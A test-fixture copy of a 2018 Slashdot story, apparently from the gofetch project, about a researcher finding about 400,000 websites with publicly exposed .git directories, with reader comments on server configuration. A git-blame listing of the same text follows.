[gofetch.git] / test / expected / SLASHDOT / 0102639752

    400,000 WEBSITES VULNERABLE THROUGH EXPOSED .GIT DIRECTORIES   \r
                          (SCMAGAZINE.COM)                         \r
\r
  Thursday September 06, 2018 @11:30PM (msmash)\r
  from the security-woes dept.\r
\r
  o Reference: 0102639752\r
  o News link: https://tech.slashdot.org/story/18/09/06/1954253/400000-websites-vulnerable-through-exposed-git-directories\r
  o Source link: https://www.scmagazine.com/home/news/400000-websites-vulnerable-through-exposed-git-directories/\r
\r
\r
    Open  .git  directories are a bigger cybersecurity problem than\r
    many  might  imagine,  at  least  according to a Czech security\r
    researcher  who  [1]discovered almost 400,000 web pages with an\r
    open  .git  directory possibly exposing a wide variety of data.\r
    From a report:\r
    \r
    >  Vladimir  Smitka  began  his  .git directory odyssey in July\r
    when  he  began looking at Czech websites to find how many were\r
    improperly  configured  and  allow access to their .git folders\r
    within  the file versions repository. Open .git directories are\r
    a  particularly  dangerous  issue,  he  said,  because they can\r
    contain  a  great  deal  of sensitive information. "Information\r
    about  the  website's structure, and sometimes you can get very\r
    sensitive   data   such   as   database  passwords,  API  keys,\r
    development  IDE  settings,  and  so  on.  However,  this  data\r
    shouldn't  be  stored  in the repository, but in previous scans\r
    of  various  security issues, I have found many developers that\r
    do  not  follow  these  best  practices,"  Smitka wrote. Smitka\r
    queried  230  million websites to discover the 390,000 allowing\r
    access  to  their  .git  directories.  The vast majority of the\r
    websites  with  open directories had a .com TLD with .net, .de,\r
    .org and uk comprising most of the others.\r
    \r
    \r
    \r
    [1] https://www.scmagazine.com/home/news/400000-websites-vulne-\r
    rable-through-exposed-git-directories/\r
\r
\r
  ** \r
\r
     ** Re: (Score:2, Informative)\r
        (by MidSpeck ( 1516577 ))\r
\r
        \r
        ^/.*/\.git/\r
        Protect git repositories in all subdirectories as well.\r
\r
\r
     ** Re: (Score:2)\r
        (by jrumney ( 197329 ))\r
\r
        \r
        Why stop there? Are there any dot files/directories that need\r
        to be served over HTTP?\r
\r
\r
     ** Re: .htaccess (Score:3)\r
        (by spongman ( 182339 ))\r
\r
        \r
        Why doesn't Apache block all '.'-prefixed directories by\r
        default?\r
\r
\r
  ** \r
\r
     ** Re:https://slashdot.org/.git (Score:4, Informative)\r
        (by ls671 ( 1122017 ))\r
\r
        \r
        Slashdot is still using CVS try [1]https://slashdot.org/CVS/\r
        [slashdot.org]\r
        you will see, it works!  :)\r
        \r
        \r
        \r
        \r
        [1] https://slashdot.org/CVS/\r
\r
\r
  ** Your central git repo ... (Score:1)\r
     (by Qbertino ( 265505 ))\r
\r
     \r
     ... belongs behind ssh or, at least, behind http access and SSL.\r
     If I catch you doing otherwise for anything other than FOSS\r
     software I'll smack you. Hard.\r
\r
     ** Re:Your central git repo ... (Score:4, Informative)\r
        (by tlhIngan ( 30335 ))\r
\r
        \r
        > ... belongs behind ssh or, at least, behind http access and\r
        > SSL.\r
        > If I catch you doing otherwise for anything other than FOSS\r
        > software I'll smack you. Hard.\r
        And it probably is. The thing is, the website owners are\r
        using git to version control and deploy their website (not a\r
        bad idea). So they develop their web site, push it to the\r
        central git repo, and whenever they need to go live, they\r
        just do a "git pull" on the webserver and it'll pull down the\r
        latest version of the website.\r
        Problem is, they forget about the hidden  .git directory git\r
        makes that stores all sorts of useful information and with a\r
        little persistence, allow you access to the raw source code\r
        since you can access the individual git objects. (Or maybe\r
        even clone it using git).\r
\r
        ** Re: (Score:2)\r
           (by jrumney ( 197329 ))\r
\r
           \r
           I do this, it is very convenient for deploying updates to\r
           the site. But I always put the web interface into a\r
           subdirectory, and only configure the web server to see\r
           that so the  .git directory is not visible over HTTP. And\r
           dotfiles and directories are blocked in the webserver\r
           config for extra protection against accidental inclusion\r
           of invisible files.\r
\r
\r
\r
  ** reheating yesterday's food (Score:3)\r
     (by Tsolias ( 2813011 ))\r
\r
     \r
     just an article from 2015 [1]https://en.internetwache.org/d...\r
     [internetwache.org]\r
     I can give you also next year's article about  .file\r
     vulnerabilities. (spoiler alert)\r
     [2]https://en.internetwache.org/s... [internetwache.org]\r
     \r
     \r
     \r
     \r
     [1]\r
     https://en.internetwache.org/dont-publicly-expose-git-or-how-we-\r
     downloaded-your-websites-sourcecode-an-analysis-of-alexas-1m-28-\r
     07-2015/\r
     [2]\r
     https://en.internetwache.org/scanning-the-alexa-top-1m-for-ds-st-\r
     ore-files-12-03-2018/\r
\r
  ** \r
\r
     ** KKK (Score:2)\r
        (by Tsolias ( 2813011 ))\r
\r
        \r
        > Thats what you get on hiring those bootcamp "graduates"\r
        Kode w/ Karlie Kloss, like it or not.\r
\r
\r
  ** Alternate headline: 99.8% websites are OK (Score:2)\r
     (by jmichaelg ( 148257 ))\r
\r
     \r
     230 million websites. 400k poorly configured. 4*10^5/2.3*10^8 is\r
     less than 0.2% of websites surveyed screwed this up.\r
     400k is a big number but it's good to know most developers\r
     aren't that stupid on this issue.\r
\r
  ** \r
\r
     ** Re: yarn dist (Score:2)\r
        (by TimMD909 ( 260285 ))\r
\r
        \r
        ... Equifax types for free security tests from 3rd parties\r
        and press coverage, presumably...\r
\r
\r
  ** So? (Score:2)\r
     (by cshark ( 673578 ))\r
\r
     \r
     An open git directory will be everything you need to reconstruct\r
     the site, more often than not from the same server you're\r
     targeting. Scary. Database servers are rarely open. Short of\r
     some serious hacking, there isn't a lot you're going to be able\r
     to do with this stuff once you've obtained the information\r
     you're waving around here.\r
     Until such time as I see hackers actually logging in with this\r
     information and defacing github, I'm going to remain unconvinced\r
     of the severity of this one.\r
\r
     ** Re: (Score:2)\r
        (by OrangeTide ( 124937 ))\r
\r
        \r
        My website's  .git directories are open intentionally. Makes\r
        for convenient mirroring and viewing of archives without\r
        having to hope and pray wayback machine picked up my obscure\r
        website.\r
        I'm not too worried. It's just data on the filesystem, it's\r
        not executing programs. And the data is not supposed to\r
        contain any secrets. If it ever does then I better rewrite my\r
        git history.\r
\r
\r
     ** Re: (Score:1)\r
        (by Anonymous Coward)\r
\r
        \r
        The most likely actual security implication is hard coded\r
        keys to 3rd party APIs.\r
        Not that this is an inevitable threat, itâ(TM)s just\r
        something I could see being inadvertently exposed and useful\r
        without much additional effort.\r
\r
        ** Re: (Score:1)\r
           (by Orrin Bloquy ( 898571 ))\r
\r
           \r
           > itâ(TM)s\r
           Clear something up, are you typing curly\r
           quotes/apostrophes on purpose or do you have your browser\r
           configured to automatically do that.\r
\r
\r
\r
     ** Re: (Score:2)\r
        (by jonwil ( 467024 ))\r
\r
        \r
        What about if that  .git folder (and the website's source\r
        code) included private keys for stuff. Or credentials/API\r
        keys for 3rd party services. Or credentials for database and\r
        other servers.\r
\r
\r
\r
Commit	Line	Data
299a08f3 NR	1	400,000 WEBSITES VULNERABLE THROUGH EXPOSED .GIT DIRECTORIES \r
	2	(SCMAGAZINE.COM) \r
	3	\r
	4	Thursday September 06, 2018 @11:30PM (msmash)\r
	5	from the security-woes dept.\r
	6	\r
c715ea02	7	o Reference: 0102639752\r
299a08f3 NR	8	o News link: https://tech.slashdot.org/story/18/09/06/1954253/400000-websites-vulnerable-through-exposed-git-directories\r
	9	o Source link: https://www.scmagazine.com/home/news/400000-websites-vulnerable-through-exposed-git-directories/\r
	10	\r
	11	\r
	12	Open .git directories are a bigger cybersecurity problem than\r
	13	many might imagine, at least according to a Czech security\r
e818d449	14	researcher who [1]discovered almost 400,000 web pages with an\r
299a08f3	15	open .git directory possibly exposing a wide variety of data.\r
e818d449 NR	16	From a report:\r
	17	\r
	18	> Vladimir Smitka began his .git directory odyssey in July\r
	19	when he began looking at Czech websites to find how many were\r
	20	improperly configured and allow access to their .git folders\r
	21	within the file versions repository. Open .git directories are\r
	22	a particularly dangerous issue, he said, because they can\r
	23	contain a great deal of sensitive information. "Information\r
	24	about the website's structure, and sometimes you can get very\r
	25	sensitive data such as database passwords, API keys,\r
	26	development IDE settings, and so on. However, this data\r
	27	shouldn't be stored in the repository, but in previous scans\r
	28	of various security issues, I have found many developers that\r
	29	do not follow these best practices," Smitka wrote. Smitka\r
	30	queried 230 million websites to discover the 390,000 allowing\r
	31	access to their .git directories. The vast majority of the\r
	32	websites with open directories had a .com TLD with .net, .de,\r
	33	.org and uk comprising most of the others.\r
	34	\r
	35	\r
	36	\r
	37	[1] https://www.scmagazine.com/home/news/400000-websites-vulne-\r
	38	rable-through-exposed-git-directories/\r
299a08f3 NR	39	\r
	40	\r
	41	** \r
	42	\r
	43	** Re: (Score:2, Informative)\r
	44	(by MidSpeck ( 1516577 ))\r
	45	\r
	46	\r
	47	^/.*/\.git/\r
	48	Protect git repositories in all subdirectories as well.\r
	49	\r
	50	\r
	51	** Re: (Score:2)\r
	52	(by jrumney ( 197329 ))\r
	53	\r
	54	\r
	55	Why stop there? Are there any dot files/directories that need\r
	56	to be served over HTTP?\r
	57	\r
	58	\r
	59	** Re: .htaccess (Score:3)\r
	60	(by spongman ( 182339 ))\r
	61	\r
	62	\r
	63	Why doesn't Apache block all '.'-prefixed directories by\r
	64	default?\r
	65	\r
	66	\r
	67	** \r
	68	\r
	69	** Re:https://slashdot.org/.git (Score:4, Informative)\r
	70	(by ls671 ( 1122017 ))\r
	71	\r
	72	\r
	73	Slashdot is still using CVS try [1]https://slashdot.org/CVS/\r
	74	[slashdot.org]\r
	75	you will see, it works! :)\r
	76	\r
	77	\r
	78	\r
	79	\r
	80	[1] https://slashdot.org/CVS/\r
	81	\r
	82	\r
	83	** Your central git repo ... (Score:1)\r
	84	(by Qbertino ( 265505 ))\r
	85	\r
	86	\r
	87	... belongs behind ssh or, at least, behind http access and SSL.\r
	88	If I catch you doing otherwise for anything other than FOSS\r
	89	software I'll smack you. Hard.\r
	90	\r
	91	** Re:Your central git repo ... (Score:4, Informative)\r
	92	(by tlhIngan ( 30335 ))\r
	93	\r
	94	\r
	95	> ... belongs behind ssh or, at least, behind http access and\r
	96	> SSL.\r
	97	> If I catch you doing otherwise for anything other than FOSS\r
	98	> software I'll smack you. Hard.\r
	99	And it probably is. The thing is, the website owners are\r
	100	using git to version control and deploy their website (not a\r
	101	bad idea). So they develop their web site, push it to the\r
	102	central git repo, and whenever they need to go live, they\r
103	just do a "git pull" on the webserver and it'll pull down the\r
104	latest version of the website.\r
105	Problem is, they forget about the hidden .git directory git\r
106	makes that stores all sorts of useful information and with a\r
107	little persistence, allow you access to the raw source code\r
108	since you can access the individual git objects. (Or maybe\r
109	even clone it using git).\r
110	\r
111	** Re: (Score:2)\r
112	(by jrumney ( 197329 ))\r
113	\r
114	\r
115	I do this, it is very convenient for deploying updates to\r
116	the site. But I always put the web interface into a\r
117	subdirectory, and only configure the web server to see\r
118	that so the .git directory is not visible over HTTP. And\r
119	dotfiles and directories are blocked in the webserver\r
120	config for extra protection against accidental inclusion\r
121	of invisible files.\r
122	\r
123	\r
124	\r
125	** reheating yesterday's food (Score:3)\r
126	(by Tsolias ( 2813011 ))\r
127	\r
128	\r
129	just an article from 2015 [1]https://en.internetwache.org/d...\r
130	[internetwache.org]\r
131	I can give you also next year's article about .file\r
132	vulnerabilities. (spoiler alert)\r
133	[2]https://en.internetwache.org/s... [internetwache.org]\r
134	\r
135	\r
136	\r
137	\r
138	[1]\r
139	https://en.internetwache.org/dont-publicly-expose-git-or-how-we-\r
140	downloaded-your-websites-sourcecode-an-analysis-of-alexas-1m-28-\r
141	07-2015/\r
142	[2]\r
143	https://en.internetwache.org/scanning-the-alexa-top-1m-for-ds-st-\r
144	ore-files-12-03-2018/\r
145	\r
146	** \r
147	\r
148	** KKK (Score:2)\r
149	(by Tsolias ( 2813011 ))\r
150	\r
151	\r
152	> Thats what you get on hiring those bootcamp "graduates"\r
153	Kode w/ Karlie Kloss, like it or not.\r
154	\r
155	\r
156	** Alternate headline: 99.8% websites are OK (Score:2)\r
157	(by jmichaelg ( 148257 ))\r
158	\r
159	\r
160	230 million websites. 400k poorly configured. 410^5/2.310^8 is\r
161	less than 0.2% of websites surveyed screwed this up.\r
162	400k is a big number but it's good to know most developers\r
163	aren't that stupid on this issue.\r
164	\r
165	** \r
166	\r
167	** Re: yarn dist (Score:2)\r
168	(by TimMD909 ( 260285 ))\r
169	\r
170	\r
171	... Equifax types for free security tests from 3rd parties\r
172	and press coverage, presumably...\r
173	\r
174	\r
175	** So? (Score:2)\r
176	(by cshark ( 673578 ))\r
177	\r
178	\r
179	An open git directory will be everything you need to reconstruct\r
180	the site, more often than not from the same server you're\r
181	targeting. Scary. Database servers are rarely open. Short of\r
182	some serious hacking, there isn't a lot you're going to be able\r
183	to do with this stuff once you've obtained the information\r
184	you're waving around here.\r
185	Until such time as I see hackers actually logging in with this\r
186	information and defacing github, I'm going to remain unconvinced\r
187	of the severity of this one.\r
188	\r
189	** Re: (Score:2)\r
190	(by OrangeTide ( 124937 ))\r
191	\r
192	\r
193	My website's .git directories are open intentionally. Makes\r
194	for convenient mirroring and viewing of archives without\r
195	having to hope and pray wayback machine picked up my obscure\r
196	website.\r
197	I'm not too worried. It's just data on the filesystem, it's\r
198	not executing programs. And the data is not supposed to\r
199	contain any secrets. If it ever does then I better rewrite my\r
200	git history.\r
201	\r
202	\r
203	** Re: (Score:1)\r
204	(by Anonymous Coward)\r
205	\r
206	\r
207	The most likely actual security implication is hard coded\r
208	keys to 3rd party APIs.\r
209	Not that this is an inevitable threat, itâ(TM)s just\r
210	something I could see being inadvertently exposed and useful\r
211	without much additional effort.\r
212	\r
213	** Re: (Score:1)\r
214	(by Orrin Bloquy ( 898571 ))\r
215	\r
216	\r
217	> itâ(TM)s\r
218	Clear something up, are you typing curly\r
219	quotes/apostrophes on purpose or do you have your browser\r
220	configured to automatically do that.\r
221	\r
222	\r
223	\r
224	** Re: (Score:2)\r
225	(by jonwil ( 467024 ))\r
226	\r
227	\r
228	What about if that .git folder (and the website's source\r
229	code) included private keys for stuff. Or credentials/API\r
230	keys for 3rd party services. Or credentials for database and\r
231	other servers.\r
232	\r
233	\r
234	\r